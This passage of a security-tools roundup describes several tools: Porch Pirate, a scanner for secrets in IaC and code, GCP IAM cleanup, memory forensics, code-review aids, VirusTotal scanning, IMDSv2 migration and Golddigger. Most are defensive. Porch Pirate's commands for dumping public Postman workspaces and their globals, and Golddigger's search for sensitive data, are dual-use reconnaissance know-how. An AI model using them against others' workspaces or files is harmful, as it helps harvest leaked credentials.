    porch-pirate -u USERNAME/TEAMNAME

    Convert Request to Curl

    Porch Pirate can build curl requests when provided with a request ID for easier testing.

    porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

    Use a proxy

    porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

    Using as a library

    Searching

    p = porchpirate()
    print(p.search('coca-cola.com'))

    Get Workspace Collections

    p = porchpirate()
    print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Dumping a Workspace

    p = porchpirate()
    collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
    for collection in collections['data']:
    requests = collection['requests']
    for r in requests:
    request_data = p.request(r['id'])
    print(request_data)

    Grabbing a Workspace's Globals

    p = porchpirate()
    print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

    Other Examples

    Other library usage examples can be located in the examples directory, which contains the following examples:

    • dump_workspace.py
    • format_search_results.py
    • format_workspace_collections.py
    • format_workspace_globals.py
    • get_collection.py
    • get_collections.py
    • get_profile.py
    • get_request.py
    • get_statistics.py
    • get_team.py
    • get_user.py
    • get_workspace.py
    • recursive_globals_from_search.py
    • request_to_curl.py
    • search.py
    • search_by_page.py
    • workspace_collections.py


    Iac-Scan-Runner - Service That Scans Your Infrastructure As Code For Common Vulnerabilities

    By: Zion3R


    Service that scans your Infrastructure as Code for common vulnerabilities.

    Aspect Information
    Tool name IaC Scan Runner
    Docker image xscanner/runner
    PyPI package iac-scan-runner
    Documentation docs
    Contact us xopera@xlab.si

    Purpose and description

    The IaC Scan Runner is a REST API service used to scan IaC (Infrastructure as Code) package and perform various code checks in order to find possible vulnerabilities and improvements. Explore the docs for more info.

    Running

    This section explains how to run the REST API.

    Run with Docker

    You can run the REST API using a public xscanner/runner Docker image as follows:

    # run IaC Scan Runner REST API in a Docker container and 
    # navigate to localhost:8080/swagger or localhost:8080/redoc
    $ docker run --name iac-scan-runner -p 8080:80 xscanner/runner

    Or you can build the image locally and run it as follows:

    # build Docker container (it will take some time) 
    $ docker build -t iac-scan-runner .
    # run IaC Scan Runner REST API in a Docker container and
    # navigate to localhost:8080/swagger or localhost:8080/redoc
    $ docker run --name iac-scan-runner -p 8080:80 iac-scan-runner

    Run from CLI

    To run using the IaC Scan Runner CLI:

    # install the CLI
    $ python3 -m venv .venv && . .venv/bin/activate
    (.venv) $ pip install iac-scan-runner
    # print OpenAPI specification
    (.venv) $ iac-scan-runner openapi
    # install prerequisites
    (.venv) $ iac-scan-runner install
    # run IaC Scan Runner REST API
    (.venv) $ iac-scan-runner run

    Run from source

    To run locally from source:

    # Export env variables 
    export MONGODB_CONNECTION_STRING=mongodb://localhost:27017
    export SCAN_PERSISTENCE=enabled
    export USER_MANAGEMENT=enabled

    # Setup MongoDB
    $ docker run --name mongodb -p 27017:27017 mongo

    # install prerequisites
    $ python3 -m venv .venv && . .venv/bin/activate
    (.venv) $ pip install -r requirements.txt
    (.venv) $ ./install-checks.sh
    # run IaC Scan Runner REST API (add --reload flag to apply code changes on the way)
    (.venv) $ uvicorn src.iac_scan_runner.api:app

    Usage and examples

    This part will show one of the possible deployments and short examples on how to use API calls.

    Firstly we will clone the iac scan runner repository and run the API.

    $ git clone https://github.com/xlab-si/iac-scan-runner.git
    $ docker compose up

    After this is done you can use different API endpoints by calling localhost:8000. You can also navigate to localhost:8000/swagger or localhost:8000/redoc and test all the API endpoints there. In this example, we will use curl for calling API endpoints.

    1. Lets create a project named test.
    curl -X 'POST' \
    'http://0.0.0.0/project?creator_id=test' \
    -H 'accept: application/json' \
    -d ''

    project id will be returned to us. For this example project id is 1e7b2a91-2896-40fd-8d53-83db56088026.

    1. For example, let say we want to initiate all check expect ansible-lint. Let's disable it.
    curl -X 'PUT' \
    'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/checks/ansible-lint/disable' \
    -H 'accept: application/json'
    1. Now when project is configured, we can simply choose files that we want to scan and zip them. For IaC-Scan-Runner to work files are expected to be a compressed archives (usually zip files). In this case response type will be json , but it is possible to change it to html.Please change YOUR.zip to path of your file.
    curl -X 'POST' \
    'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/scan?scan_response_type=json' \
    -H 'accept: application/json' \
    -H 'Content-Type: multipart/form-data' \
    -F 'iac=@YOUR.zip;type=application/zip'

    That is it.

    Extending the scan workflow with new check tools

    At certain point, it might be required to include new check tools within the scan workflow, with aim to provide wider coverage of IaC standards and project types. Therefore, in this subsection, a sequence of required steps for that purpose is identified and described. However, the steps have to be performed manually as it will be described, but it is planned to automatize this procedure in future via API and provide user-friendly interface that will aid the user while importing new tools that will become part of the available catalogue that makes the scan workflow. Figure 16 depicts the required steps which have to be taken in order to extend the scan workflow with a new tool.

    Step 1 โ€“ Adding tool-specific class to checks directory First, it is required to add a new tool-specific Python class to the checks directory inside IaC Scan Runnerโ€™s source code: iac-scan-runner/src/iac_scan_runner/checks/new_tool.py
    The class of a new tool inherits the existing Check class, which provides generalization of scan workflow tools. Moreover, it is necessary to provide implementation of the following methods:

    1. def configure(self, config_filename: Optional[str], secret: Optional[SecretStr])
    2. def run(self, directory: str) While the first one aims to provide the necessary tool-specific parameters in order to set it up (such as passwords, client ids and tokens), another one specifies how the tool itself is invoked via API or CLI and its raw output returned.

    Step 2 โ€“ Adding the check tool class instance within ScanRunner constructor Once the new class derived from Check is added to the IaC Scan Runnerโ€™s source code, it is also required to modify the source code of its main class, called ScanRunner. When it comes to modifications of this class, it is required first to import the tool-specific class, create a new check tool-specific class instance and adding it to the dictionary of IaC checks inside def init_checks(self). A. Importing the check tool class from iac_scan_runner.checks.tfsec import TfsecCheck B. Creating new instance of check tool object inside init_checks """Initiate predefined check objects""" new_tool = NewToolCheck() C. Adding it to self.iac_checks dictionary inside init_checks

        self.iac_checks = {
    new_tool.name: new_tool,
    โ€ฆ
    }

    Step 3 โ€“ Adding the check tool to the compatibility matrix inside Compatibility class On the other side, inside file src/iac_scan_runner/compatibility.py, the dictionary which represents compatibility matrix should be extended as well. There are two possible cases: a) new file type should be added as a key, together with list of relevant tools as value b) new tool should be added to the compatibility list for the existing file type.

        compatibility_matrix = {
    "new_type": ["new_tool_1", "new_tool_2"],
    โ€ฆ
    "old_typeK": ["tool_1", โ€ฆ "tool_N", "new_tool_3"]
    }

    Step 4 โ€“ Providing the support for result summarization Finally, the last step in sequence of required modifications for scan workflow extension is to modify class ResultsSummary (src/iac_scan_runner/results_summary.py). Precisely, it is required to append a part of the code to its method summarize_outcome that will look for specific strings which are tool-specific and can be used to identify whether the check passed or failed. Inside the loop that traverses the compatible checks, for each new tool the following structure of if-else should be included:

            if check == "new_tool":
    if outcome.find("Check pass string") > -1:
    self.outcomes[check]["status"] = "Passed"
    return "Passed"
    else:
    self.outcomes[check]["status"] = "Problems"
    return "Problems"

    Contact

    You can contact the xOpera team by sending an email to xopera@xlab.si.

    Acknowledgement

    This project has received funding from the European Unionโ€™s Horizon 2020 research and innovation programme under Grant Agreement No. 101000162 (PIACERE).



    Deepsecrets - Secrets Scanner That Understands Code

    By: Zion3R


    Yet another tool - why?

    Existing tools don't really "understand" code. Instead, they mostly parse texts.

    DeepSecrets expands classic regex-search approaches with semantic analysis, dangerous variable detection, and more efficient usage of entropy analysis. Code understanding supports 500+ languages and formats and is achieved by lexing and parsing - techniques commonly used in SAST tools.

    DeepSecrets also introduces a new way to find secrets: just use hashed values of your known secrets and get them found plain in your code.

    Under the hood story is in articles here: https://hackernoon.com/modernizing-secrets-scanning-part-1-the-problem


    Mini-FAQ after release :)

    Pff, is it still regex-based?

    Yes and no. Of course, it uses regexes and finds typed secrets like any other tool. But language understanding (the lexing stage) and variable detection also use regexes under the hood. So regexes is an instrument, not a problem.

    Why don't you build true abstract syntax trees? It's academically more correct!

    DeepSecrets tries to keep a balance between complexity and effectiveness. Building a true AST is a pretty complex thing and simply an overkill for our specific task. So the tool still follows the generic SAST-way of code analysis but optimizes the AST part using a different approach.

    I'd like to build my own semantic rules. How do I do that?

    Only through the code by the moment. Formalizing the rules and moving them into a flexible and user-controlled ruleset is in the plans.

    I still have a question

    Feel free to communicate with the maintainer

    Installation

    From Github via pip

    $ pip install git+https://github.com/avito-tech/deepsecrets.git

    From PyPi

    $ pip install deepsecrets

    Scanning

    The easiest way:

    $ deepsecrets --target-dir /path/to/your/code --outfile report.json

    This will run a scan against /path/to/your/code using the default configuration:

    • Regex checks by the built-in ruleset
    • Semantic checks (variable detection, entropy checks)

    Report will be saved to report.json

    Fine-tuning

    Run deepsecrets --help for details.

    Basically, you can use your own ruleset by specifying --regex-rules. Paths to be excluded from scanning can be set via --excluded-paths.

    Building rulesets

    Regex

    The built-in ruleset for regex checks is located in /deepsecrets/rules/regexes.json. You're free to follow the format and create a custom ruleset.

    HashedSecret

    Example ruleset for regex checks is located in /deepsecrets/rules/regexes.json. You're free to follow the format and create a custom ruleset.

    Contributing

    Under the hood

    There are several core concepts:

    • File
    • Tokenizer
    • Token
    • Engine
    • Finding
    • ScanMode

    File

    Just a pythonic representation of a file with all needed methods for management.

    Tokenizer

    A component able to break the content of a file into pieces - Tokens - by its logic. There are four types of tokenizers available:

    • FullContentTokenizer: treats all content as a single token. Useful for regex-based search.
    • PerWordTokenizer: breaks given content by words and line breaks.
    • LexerTokenizer: uses language-specific smarts to break code into semantically correct pieces with additional context for each token.

    Token

    A string with additional information about its semantic role, corresponding file, and location inside it.

    Engine

    A component performing secrets search for a single token by its own logic. Returns a set of Findings. There are three engines available:

    • RegexEngine: checks tokens' values through a special ruleset
    • SemanticEngine: checks tokens produced by the LexerTokenizer using additional context - variable names and values
    • HashedSecretEngine: checks tokens' values by hashing them and trying to find coinciding hashes inside a special ruleset

    Finding

    This is a data structure representing a problem detected inside code. Features information about the precise location inside a file and a rule that found it.

    ScanMode

    This component is responsible for the scan process.

    • Defines the scope of analysis for a given work directory respecting exceptions
    • Allows declaring a PerFileAnalyzer - the method called against each file, returning a list of findings. The primary usage is to initialize necessary engines, tokenizers, and rulesets.
    • Runs the scan: a multiprocessing pool analyzes every file in parallel.
    • Prepares results for output and outputs them.

    The current implementation has a CliScanMode built by the user-provided config through the cli args.

    Local development

    The project is supposed to be developed using VSCode and 'Remote containers' feature.

    Steps:

    1. Clone the repository
    2. Open the cloned folder with VSCode
    3. Agree with 'Reopen in container'
    4. Wait until the container is built and necessary extensions are installed
    5. You're ready


    CureIAM - Clean Accounts Over Permissions In GCP Infra At Scale

    By: Zion3R

    Clean up of over permissioned IAM accounts on GCP infra in an automated way

    CureIAM is an easy-to-use, reliable, and performant engine for Least Privilege Principle Enforcement on GCP cloud infra. It enables DevOps and Security team to quickly clean up accounts in GCP infra that have granted permissions of more than what are required. CureIAM fetches the recommendations and insights from GCP IAM recommender, scores them and enforce those recommendations automatically on daily basic. It takes care of scheduling and all other aspects of running these enforcement jobs at scale. It is built on top of GCP IAM recommender APIs and Cloudmarker framework.


    Key features

    Discover what makes CureIAM scalable and production grade.

    • Config driven : The entire workflow of CureIAM is config driven. Skip to Config section to know more about it.
    • Scalable : Its is designed to scale because of its plugin driven, multiprocess and multi-threaded approach.
    • Handles Scheduling: Scheduling part is embedded in CureIAM code itself, configure the time, and CureIAM will run daily at that time note.
    • Plugin driven: CureIAM codebase is completely plugin oriented, which means, one can plug and play the existing plugins or create new to add more functionality to it.
    • Track actionable insights: Every action that CureIAM takes, is recorded for audit purpose, It can do that in file store and in elasticsearch store. If you want you can build other store plugins to push that to other stores for tracking purposes.
    • Scoring and Enforcement: Every recommendation that is fetch by CureIAM is scored against various parameters, after that couple of scores like safe_to_apply_score, risk_score, over_privilege_score. Each score serves a different purpose. For safe_to_apply_score identifies the capability to apply recommendation on automated basis, based on the threshold set in CureIAM.yaml config file.

    Usage

    Since CureIAM is built with python, you can run it locally with these commands. Before running make sure to have a configuration file ready in either of /etc/CureIAM.yaml, ~/.CureIAM.yaml, ~/CureIAM.yaml, or CureIAM.yaml and there is Service account JSON file present in current directory with name preferably cureiamSA.json. This SA private key can be named anything, but for docker image build, it is preferred to use this name. Make you to reference this file in config for GCP cloud.

    # Install necessary dependencies
    $ pip install -r requirements.txt

    # Run CureIAM now
    $ python -m CureIAM -n

    # Run CureIAM process as schedular
    $ python -m CureIAM

    # Check CureIAM help
    $ python -m CureIAM --help

    CureIAM can be also run inside a docker environment, this is completely optional and can be used for CI/CD with K8s cluster deployment.

    # Build docker image from dockerfile
    $ docker build -t cureiam .

    # Run the image, as schedular
    $ docker run -d cureiam

    # Run the image now
    $ docker run -f cureiam -m cureiam -n

    Config

    CureIAM.yaml configuration file is the heart of CureIAM engine. Everything that engine does it does it based on the pipeline configured in this config file. Let's break this down in different sections to make this config look simpler.

    1. Let's configure first section, which is logging configuration and scheduler configuration.
      logger:
    version: 1

    disable_existing_loggers: false

    formatters:
    verysimple:
    format: >-
    [%(process)s]
    %(name)s:%(lineno)d - %(message)s
    datefmt: "%Y-%m-%d %H:%M:%S"

    handlers:
    rich_console:
    class: rich.logging.RichHandler
    formatter: verysimple

    file:
    class: logging.handlers.TimedRotatingFileHandler
    formatter: simple
    filename: /tmp/CureIAM.log
    when: midnight
    encoding: utf8
    backupCount: 5

    loggers:
    adal-python:
    level: INFO

    root:
    level: INFO
    handlers:
    - rich_console
    - file

    schedule: "16:00"

    This subsection of config uses, Rich logging module and schedules CureIAM to run daily at 16:00.

    1. Next section is configure different modules, which we MIGHT use in pipeline. This falls under plugins section in CureIAM.yaml. You can think of this section as declaration for different plugins.
      plugins:
    gcpCloud:
    plugin: CureIAM.plugins.gcp.gcpcloud.GCPCloudIAMRecommendations
    params:
    key_file_path: cureiamSA.json

    filestore:
    plugin: CureIAM.plugins.files.filestore.FileStore

    gcpIamProcessor:
    plugin: CureIAM.plugins.gcp.gcpcloudiam.GCPIAMRecommendationProcessor
    params:
    mode_scan: true
    mode_enforce: true
    enforcer:
    key_file_path: cureiamSA.json
    allowlist_projects:
    - alpha
    blocklist_projects:
    - beta
    blocklist_accounts:
    - foo@bar.com
    allowlist_account_types:
    - user
    - group
    - serviceAccount
    blocklist_account_types:
    - None
    min_safe_to_apply_score_user: 0
    min_safe_to_apply_scor e_group: 0
    min_safe_to_apply_score_SA: 50

    esstore:
    plugin: CureIAM.plugins.elastic.esstore.EsStore
    params:
    # Change http to https later if your elastic are using https
    scheme: http
    host: es-host.com
    port: 9200
    index: cureiam-stg
    username: security
    password: securepassword

    Each of these plugins declaration has to be of this form:

      plugins:
    <plugin-name>:
    plugin: <class-name-as-python-path>
    params:
    param1: val1
    param2: val2

    For example, for plugins CureIAM.stores.esstore.EsStore which is this file and class EsStore. All the params which are defined in yaml has to match the declaration in __init__() function of the same plugin class.

    1. Once plugins are defined , next step is to define how to define pipeline for auditing. And it goes like this:
      audits:
    IAMAudit:
    clouds:
    - gcpCloud
    processors:
    - gcpIamProcessor
    stores:
    - filestore
    - esstore

    Multiple Audits can be created out of this. The one created here is named IAMAudit with three plugins in use, gcpCloud, gcpIamProcessor, filestores and esstore. Note these are the same plugin names defined in Step 2. Again this is like defining the pipeline, not actually running it. It will be considered for running with definition in next step.

    1. Tell CureIAM to run the Audits defined in previous step.
      run:
    - IAMAudits

    And this makes the entire configuration for CureIAM, you can find the full sample here, this config driven pipeline concept is inherited from Cloudmarker framework.

    Dashboard

    The JSON which is indexed in elasticsearch using Elasticsearch store plugin, can be used to generate dashboard in Kibana.

    Contribute

    [Please do!] We are looking for any kind of contribution to improve CureIAM's core funtionality and documentation. When in doubt, make a PR!

    Credits

    Gojek Product Security Team

    Demo

    <>

    =============

    NEW UPDATES May 2023 0.2.0

    Refactoring

    • Breaking down the large code into multiple small function
    • Moving all plugins into plugins folder: Esstore, files, Cloud and GCP.
    • Adding fixes into zero divide issues
    • Migration to new major version of elastic
    • Change configuration in CureIAM.yaml file
    • Tested in python version 3.9.X

    Library Updates

    Adding the version in library to avoid any back compatibility issues.

    • Elastic==8.7.0 # previously 7.17.9
    • elasticsearch==8.7.0
    • google-api-python-client==2.86.0
    • PyYAML==6.0
    • schedule==1.2.0
    • rich==13.3.5

    Docker Files

    • Adding Docker Compose for local Elastic and Kibana in elastic
    • Adding .env-ex change .env-ex to .env to before running the docker
    Running docker compose: docker-compose -f docker_compose_es.yaml up 

    Features

    • Adding the capability to run scan without applying the recommendation. By default, if mode_scan is false, mode_enforce won't be running.
          mode_scan: true
    mode_enforce: false
    • Turn off the email function temporarily.


    MemTracer - Memory Scaner

    By: Zion3R


    MemTracer is a tool that offers live memory analysis capabilities, allowing digital forensic practitioners to discover and investigate stealthy attack traces hidden in memory. The MemTracer is implemented in Python language, aiming to detect reflectively loaded native .NET framework Dynamic-Link Library (DLL). This is achieved by looking for the following abnormal memory regionโ€™s characteristics:

    • The state of memory pages flags in each memory region. Specifically, the MEM_COMMIT flag which is used to reserve memory pages for virtual memory use.
    • The type of pages in the region. The MEM_MAPPED page type indicates that the memory pages within the region are mapped into the view of a section.
    • The memory protection for the region. The PAGE_READWRITE protection to indicate that the memory region is readable and writable, which happens if Assembly.Load(byte[]) method is used to load a module into memory.
    • The memory region contains a PE header.

    The tool starts by scanning the running processes, and by analyzing the allocated memory regions characteristics to detect reflective DLL loading symptoms. Suspicious memory regions which are identified as DLL modules are dumped for further analysis and investigation.
    Furthermore, the tool features the following options:

    • Dump the compromised process.
    • Export a JSON file that provides information about the compromised process, such as the process name, ID, path, size, and base address.
    • Search for specific loaded module by name.

    Example

    python.exe memScanner.py [-h] [-r] [-m MODULE]
    -h, --help show this help message and exit
    -r, --reflectiveScan Looking for reflective DLL loading
    -m MODULE, --module MODULE Looking for spcefic loaded DLL

    The script needs administrator privileges in order incepect all processes.



    DakshSCRA - Source Code Review Assist

    By: Zion3R


    Daksh SCRA (Source Code Review Assist) tool is built to enhance the efficiency of the source code review process, providing a well-structured and organized approach for code reviewers.

    Rather than indiscriminately flagging everything as a potential issue, Daksh SCRA promotes thoughtful analysis, urging the investigation and confirmation of potential problems. This approach mitigates the scramble to tag every potential concern as a bug, cutting back on the confusion and wasted time spent on false positives.

    What sets Daksh SCRA apart is its emphasis on avoiding unnecessary bug tagging. Unlike conventional methods, it advocates for thorough investigation and confirmation of potential issues before tagging them as bugs. This approach helps mitigate the issue of false positives, which often consume valuable time and resources, thereby fostering a more productive and efficient code review process.


    Debut

    Daksh SCRA was initially introduced during a source code review training session I conducted at Black Hat USA 2022 (August 6 - 9), where it was subtly presented to a specific audience. However, this introduction was carried out with a low-profile approach, avoiding any major announcements.

    While this tool was quietly published on GitHub after the 2022 training, its official public debut took place at Black Hat USA 2023 in Las Vegas.

    Features and Functionalities

    Distinctive Features (Multiple Worldโ€™s First)

    • Identifies Areas of Interest in Source Code: Encourage focused investigation and confirmation rather than indiscriminately labeling everything as a bug.

    • Identifies Areas of Interest in File Paths (Worldโ€™s First): Recognises patterns in file paths to pinpoint relevant sections for review.

    • Software-Level Reconnaissance to Identify Technologies Utilised: Identifies project technologies, enabling code reviewers to conduct precise scans with appropriate rules.

    • Automated Scientific Effort Estimation for Code Review (Worldโ€™s First): Providing a measurable approach for estimating efforts required for a code review process.

    Although this tool has progressed beyond its early stages, it has reached a functional state that is quite usable and delivers on its promised capabilities. Nevertheless, active enhancements are currently underway, and there are multiple new features and improvements expected to be added in the upcoming months.

    Additionally, the tool offers the following functionalities:

    • Options to use platform-specific rules specific for finding areas of interests
    • Options to extend or add new rules for any new or existing languages
    • Generates report in text, HTML and PDF format for inspection

    Refer to the wiki for the tool setup and usage details - https://github.com/coffeeandsecurity/DakshSCRA/wiki

    Feel free to contribute towards updating or adding new rules and future development.

    If you find any bugs, report them to d3basis.m0hanty@gmail.com.

    Tool Setup

    Pre-requisites

    Python3 and all the libraries listed in requirements.txt

    Setting up environment to run this tool

    1. Setup a virtual environment

    $ pip install virtualenv

    $ virtualenv -p python3 {name-of-virtual-env} // Create a virtualenv
    Example: virtualenv -p python3 venv

    $ source {name-of-virtual-env}/bin/activate // To activate virtual environment you just created
    Example: source venv/bin/activate

    After running the activate command you should see the name of your virtual env at the beginning of your terminal like this: (venv) $

    2. Ensure all required libraries are installed within the virtual environment

    You must run the below command after activating the virtual environment as mentioned in the previous steps.

    pip install -r requirements.txt

    Once the above step successfully installs all the required libraries, refer to the following tool usage commands to run the tool.

    Tool Usage

    $ python3 dakshscra.py -h // To view avaialble options and arguments

    usage: dakshscra.py [-h] [-r RULE_FILE] [-f FILE_TYPES] [-v] [-t TARGET_DIR] [-l {R,RF}] [-recon] [-estimate]

    options:
    -h, --help show this help message and exit
    -r RULE_FILE Specify platform specific rule name
    -f FILE_TYPES Specify file types to scan
    -v Specify verbosity level {'-v', '-vv', '-vvv'}
    -t TARGET_DIR Specify target directory path
    -l {R,RF}, --list {R,RF}
    List rules [R] OR rules and filetypes [RF]
    -recon Detects platform, framework and programming language used
    -estimate Estimate efforts required for code review

    Example Usage

    $ python3 dakshscra.py // To view tool usage along with examples

    Examples:
    # '-f' is optional. If not specified, it will default to the corresponding filetypes of the selected rule.
    dakshsca.py -r php -t /source_dir_path

    # To override default settings, other filetypes can be specified with '-f' option.
    dakshsca.py -r php -f dotnet -t /path_to_source_dir
    dakshsca.py -r php -f custom -t /path_to_source_dir

    # Perform reconnaissance and rule based scanning if '-recon' used with '-r' option.
    dakshsca.py -recon -r php -t /path_to_source_dir

    # Perform only reconnaissance if '-recon' used without the '-r' option.
    dakshsca.py -recon -t /path_to_source_dir

    # Verbosity: '-v' is default, '-vvv' will display all rules check within each rule category.
    dakshsca.py -r php -vv -t /path_to_source_dir


    Supported RULE_FILE: dotnet, java, php, javascript
    Supported FILE_TY PES: dotnet, php, java, custom, allfiles

    Reports

    The tool generates reports in three formats: HTML, PDF, and TEXT. Although the HTML and PDF reports are still being improved, they are currently in a reasonably good state. With each subsequent iteration, these reports will continue to be refined and improved even further.

    Scanning (Areas of Security Concerns) Report

    HTML Report:
    • DakshSCRA/reports/html/report.html
    PDF Report:
    • DakshSCRA/reports/html/report.pdf
    RAW TEXT Based Reports:
    • Areas of Interest - Identified Patterns : DakshSCRA/reports/text/areas_of_interest.txt
    • Areas of Interest - Project Files: DakshSCRA/reports/text/filepaths_aoi.txt
    • Identified Project Files: DakshSCRA/runtime/filepaths.txt

    Reconnaissance (Recon) Report

    • Reconnaissance Summary: /reports/text/recon.txt

    Note: Currently, the reconnaissance report is created in a text format. However, in upcoming releases, the plan is to incorporate it into the vulnerability scanning report, which will be available in both HTML and PDF formats.

    Code Review Effort Estimation Report

    • Effort estimation report: /reports/html/estimation.html

    Note: At present, the effort estimation for the source code review is in its early stages. It is considered experimental and will be developed and refined through several iterations. Improvements will be made over multiple releases, as the formula and the concept are new and require time to be honed to achieve accuracy or reasonable estimation.

    Currently, the report is generated in HTML format. However, in future releases, there are plans to also provide it in PDF format.



    VTScanner - A Comprehensive Python-based Security Tool For File Scanning, Malware Detection, And Analysis In An Ever-Evolving Cyber Landscape

    By: Zion3R

    VTScanner is a versatile Python tool that empowers users to perform comprehensive file scans within a selected directory for malware detection and analysis. It seamlessly integrates with the VirusTotal API to deliver extensive insights into the safety of your files. VTScanner is compatible with Windows, macOS, and Linux, making it a valuable asset for security-conscious individuals and professionals alike.


    Features

    1. Directory-Based Scanning

    VTScanner enables users to choose a specific directory for scanning. By doing so, you can assess all the files within that directory for potential malware threats.

    2. Detailed Scan Reports

    Upon completing a scan, VTScanner generates detailed reports summarizing the results. These reports provide essential information about the scanned files, including their hash, file type, and detection status.

    3. Hash-Based Checks

    VTScanner leverages file hashes for efficient malware detection. By comparing the hash of each file to known malware signatures, it can quickly identify potential threats.

    4. VirusTotal Integration

    VTScanner interacts seamlessly with the VirusTotal API. If a file has not been scanned on VirusTotal previously, VTScanner automatically submits its hash for analysis. It then waits for the response, allowing you to access comprehensive VirusTotal reports.

    5. Time Delay Functionality

    For users with free VirusTotal accounts, VTScanner offers a time delay feature. This function introduces a specified delay (recommended between 20-25 seconds) between each scan request, ensuring compliance with VirusTotal's rate limits.

    6. Premium API Support

    If you have a premium VirusTotal API account, VTScanner provides the option for concurrent scanning. This feature allows you to optimize scanning speed, making it an ideal choice for more extensive file collections.

    7. Interactive VirusTotal Exploration

    VTScanner goes the extra mile by enabling users to explore VirusTotal's detailed reports for any file with a simple double-click. This feature offers valuable insights into file detections and behavior.

    8. Preinstalled Windows Binaries

    For added convenience, VTScanner comes with preinstalled Windows binaries compiled using PyInstaller. These binaries are detected by 10 antivirus scanners.

    9. Custom Binary Generation

    If you prefer to generate your own binaries or use VTScanner on non-Windows platforms, you can easily create custom binaries with PyInstaller.

    Installation

    Prerequisites

    Before installing VTScanner, make sure you have the following prerequisites in place:

    • Python 3.6 installed on your system.
    pip install -r requirements.txt

    Download VTScanner

    You can acquire VTScanner by cloning the GitHub repository to your local machine:

    git clone https://github.com/samhaxr/VTScanner.git

    Usage

    To initiate VTScanner, follow these steps:

    cd VTScanner
    python3 VTScanner.py

    Configuration

    • Set the time delay between scan requests.
    • Enter your VirusTotal API key in config.ini

    License

    VTScanner is released under the GPL License. Refer to the LICENSE file for full licensing details.

    Disclaimer

    VTScanner is a tool designed to enhance security by identifying potential malware threats. However, it's crucial to remember that no tool provides foolproof protection. Always exercise caution and employ additional security measures when handling files that may contain malicious content. For inquiries, issues, or feedback, please don't hesitate to open an issue on our GitHub repository. Thank you for choosing VTScanner v1.0.



    IMDShift - Automates Migration Process Of Workloads To IMDSv2 To Avoid SSRF Attacks

    By: Zion3R


    AWS workloads that rely on the metadata endpoint are vulnerable to Server-Side Request Forgery (SSRF) attacks. IMDShift automates the migration process of all workloads to IMDSv2 with extensive capabilities, which implements enhanced security measures to protect against these attacks.


    Features

    • Detection of AWS workloads that rely on the metadata endpoint amongst various services which includes - EC2, ECS, EKS, Lightsail, AutoScaling Groups, Sagemaker Notebooks, Beanstalk (in progress)
    • Simple and intuitive command-line interface for easy usage
    • Automated migration of all workloads to IMDSv2
    • Standalone hop limit update for compatible resources
    • Standalone metadata endpoint enable operation for compatible resources
    • Detailed logging of migration process
    • Identify resources that are using IMDSv1, using the MetadataNoToken CloudWatch metric across specified regions
    • Built-in Service Control Policy (SCP) recommendations

    IMDShift vs. Metabadger

    Metabadger is an older tool that was used to facilitate migration of AWS EC2 workloads to IMDSv2.

    IMDShift makes several improvements on Metabadger's capabilities:

    • IMDShift allows migration of standalone services and not all EC2 instances, blindly. For example, the user can choose to only migrate EKS workloads, also some services such as Lightsail, do not fall under EC2 umbrella, IMDShift has the capability to migrate such resources as well.
    • IMDShift allows standalone enabling of metadata endpoint for resources it is currently disabled, without having to perform migration on the remaining resources
    • IMDShift allows standalone update response hop limit for resources where metadata endpoint is enabled, without having to perform migration on the remaining resources
    • IMDShift allows, not only the option to include specific regions, but also skip specified regions
    • IMDShift not only allows usage of AWS profiles, but also can assume roles, to work
    • IMDShift helps with post-migration activities, by suggesting various Service Control Policies (SCPs) to implement.

    Installation

    Production Installation

    git clone https://github.com/ayushpriya10/imdshift.git
    cd imdshift/
    python3 -m pip install .

    Development Installation

    git clone https://github.com/ayushpriya10/imdshift.git
    cd imdshift/
    python3 -m pip install -e .

    Usage

    Options:
    --services TEXT This flag specifies services scan for IMDSv1
    usage from [EC2, Sagemaker, ASG (Auto Scaling
    Groups), Lightsail, ECS, EKS, Beanstalk].
    Format: "--services EC2,Sagemaker,ASG"
    --include-regions TEXT This flag specifies regions explicitly to
    include scan for IMDSv1 usage. Format: "--
    include-regions ap-south-1,ap-southeast-1"
    --exclude-regions TEXT This flag specifies regions to exclude from the
    scan explicitly. Format: "--exclude-regions ap-
    south-1,ap-southeast-1"
    --migrate This boolean flag enables IMDShift to perform
    the migration, defaults to "False". Format: "--
    migrate"
    -- update-hop-limit INTEGER This flag specifies if the hop limit should be
    updated and with what value. It is recommended
    to set the hop limit to "2" to enable containers
    to be able to work with the IMDS endpoint. If
    this flag is not passed, hop limit is not
    updated during migration. Format: "--update-hop-
    limit 3"
    --enable-imds This boolean flag enables IMDShift to enable the
    metadata endpoint for resources that have it
    disabled and then perform the migration,
    defaults to "False". Format: "--enable-imds"
    --profile TEXT This allows you to use any profile from your
    ~/.aws/credentials file. Format: "--profile
    prod-env"
    --role-arn TEXT This flag let's you assume a role via aws sts.
    Format: "--role-arn
    arn:aws:sts::111111111:role/John"
    --print-scps This boolean flag prints Service Control
    Policies (SCPs) that can be used to control IMDS
    usage, like deny access for credentials fetched
    from IMDSv2 or deny creation of resources with
    IMDSv1, defaults to "False". Format: "--print-
    scps"
    --check-imds-usage This boolean flag launches a scan to identify
    how many instances are using IMDSv1 in specified
    regions, during the last 30 days, by using the
    "MetadataNoToken" CloudWatch metric, defaults to
    "False". Format: "--check-imds-usage"
    --help Show this message and exit.


    Golddigger - Search Files For Gold

    By: Zion3R


    Gold Digger is a simple tool used to help quickly discover sensitive information in files recursively. Originally written to assist in rapidly searching files obtained during a penetration test.


    Installation

    Gold Digger requires Python3.

    virtualenv -p python3 .
    source bin/activate
    python dig.py --help

    Usage

    Directory to search for gold -r RECURSIVE, --recursive RECURSIVE Search directory recursively? -l LOG, --log LOG Log file to save output" dir="auto">
    usage: dig.py [-h] [-e EXCLUDE] [-g GOLD] -d DIRECTORY [-r RECURSIVE] [-l LOG]

    optional arguments:
    -h, --help show this help message and exit
    -e EXCLUDE, --exclude EXCLUDE
    JSON file containing extension exclusions
    -g GOLD, --gold GOLD JSON file containing the gold to search for
    -d DIRECTORY, --directory DIRECTORY
    Directory to search for gold
    -r RECURSIVE, --recursive RECURSIVE
    Search directory recursively?
    -l LOG, --log LOG Log file to save output

    Example Usage

